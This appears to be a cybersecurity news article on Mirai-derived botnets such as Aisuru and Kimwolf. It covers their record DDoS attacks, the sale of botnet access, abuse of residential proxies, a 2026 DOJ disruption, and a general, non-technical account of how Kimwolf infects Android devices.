Mirai-Based Botnets: The Rising Threat of Massive DDoS Attacks and Proxy Abuse
In recent years, the cybersecurity landscape has been increasingly dominated by botnet-driven threats, with Mirai-based botnets at the forefront. Initially identified in 2016, Mirai targeted Internet of Things (IoT) devices operating on ARC processors with minimal Linux versions. Cybercriminals exploited these devices by leveraging known vulnerabilities or default factory credentials that users often neglected to change. What began as a tool for Distributed Denial-of-Service (DDoS) attacks has evolved into a vast network of variants, each more sophisticated and destructive than its predecessor.
The Proliferation of Mirai Variants
The public release of Mirai’s source code has led to an explosion of customized versions. According to Spamhaus, there was a 26% increase in botnet command and control (C2) servers in the first half of 2025, followed by another 24% rise between July and December 2025. This surge has positioned the United States ahead of China as the leading host of botnet C2 servers, a title China had held since the third quarter of 2023. This rapid growth underscores the widespread availability of the Mirai codebase and the ease with which cybercriminals can develop new variants.
Aisuru and Kimwolf: The New Titans of DDoS
Among the myriad of Mirai derivatives, Aisuru and Kimwolf have emerged as particularly formidable. Collectively referred to as Aisuru-Kimwolf, these variants have compromised between one and four million devices globally. Cloudflare reports that Aisuru-Kimwolf is responsible for some of the largest DDoS attacks on record, including a staggering 31.4 terabit-per-second flood and a 14.1 billion packet-per-second assault. These figures far surpass the capabilities of earlier Mirai versions, highlighting the escalating danger posed by these botnets.
Commercialization of Botnet Infrastructure
The operators behind Aisuru-Kimwolf have transformed their botnet infrastructure into a lucrative criminal enterprise. They sell access to compromised devices through platforms like Discord and Telegram, enabling other malicious actors to launch attacks or conduct illicit activities. On March 19, 2026, the U.S. Department of Justice announced court-authorized actions to disrupt the C2 servers supporting Aisuru, Kimwolf, JackSkid, and Mossad botnets, with enforcement operations extending to Canada and Germany. Despite these efforts, the botnets have demonstrated resilience, continually adapting to maintain their operations.
Exploitation of Residential Proxy Networks
Beyond orchestrating DDoS attacks, these botnets have been implicated in the abuse of residential proxy networks. By routing malicious traffic through IP addresses assigned to ordinary homeowners, cybercriminals can obfuscate their activities, making detection and attribution significantly more challenging. This tactic not only complicates mitigation efforts but also implicates unsuspecting individuals in cybercriminal activities without their knowledge.
Kimwolf’s Infection Mechanism and Evasion Tactics
Kimwolf, an Android-focused variant of Aisuru, specifically targets mobile devices and Smart TVs. It has infected approximately two million Android devices worldwide, adapting Aisuru’s DDoS capabilities for Android systems. The infection process involves executing an install script that downloads `.apk` files from attacker-controlled servers. These files are made executable and run sequentially, targeting various CPU architectures to maximize the spread of the malware.
Following disruptions by Google and the Department of Justice to the IPIDEA residential proxy infrastructure associated with Kimwolf, reports indicate that the botnet has shifted to The Invisible Internet Project (I2P) to evade detection and maintain its operations. This move underscores the adaptability of these botnets and the ongoing challenges in combating them.
The Evolving Threat Landscape
The evolution of Mirai-based botnets into sophisticated tools for massive DDoS attacks and proxy abuse represents a significant escalation in cyber threats. The ease of access to Mirai’s source code, combined with the lucrative nature of botnet operations, ensures that these threats will continue to evolve. As cybercriminals refine their tactics and expand their reach, it is imperative for individuals, organizations, and governments to enhance their cybersecurity measures. This includes regularly updating and patching devices, changing default credentials, and implementing robust network monitoring to detect and mitigate botnet activities.
Conclusion
The rise of Mirai-based botnets like Aisuru and Kimwolf highlights the dynamic and escalating nature of cyber threats. Their ability to launch unprecedented DDoS attacks and exploit residential proxy networks poses significant challenges to global cybersecurity. Combating these threats requires a concerted effort from all stakeholders to stay ahead of cybercriminals and protect the integrity of digital infrastructures.
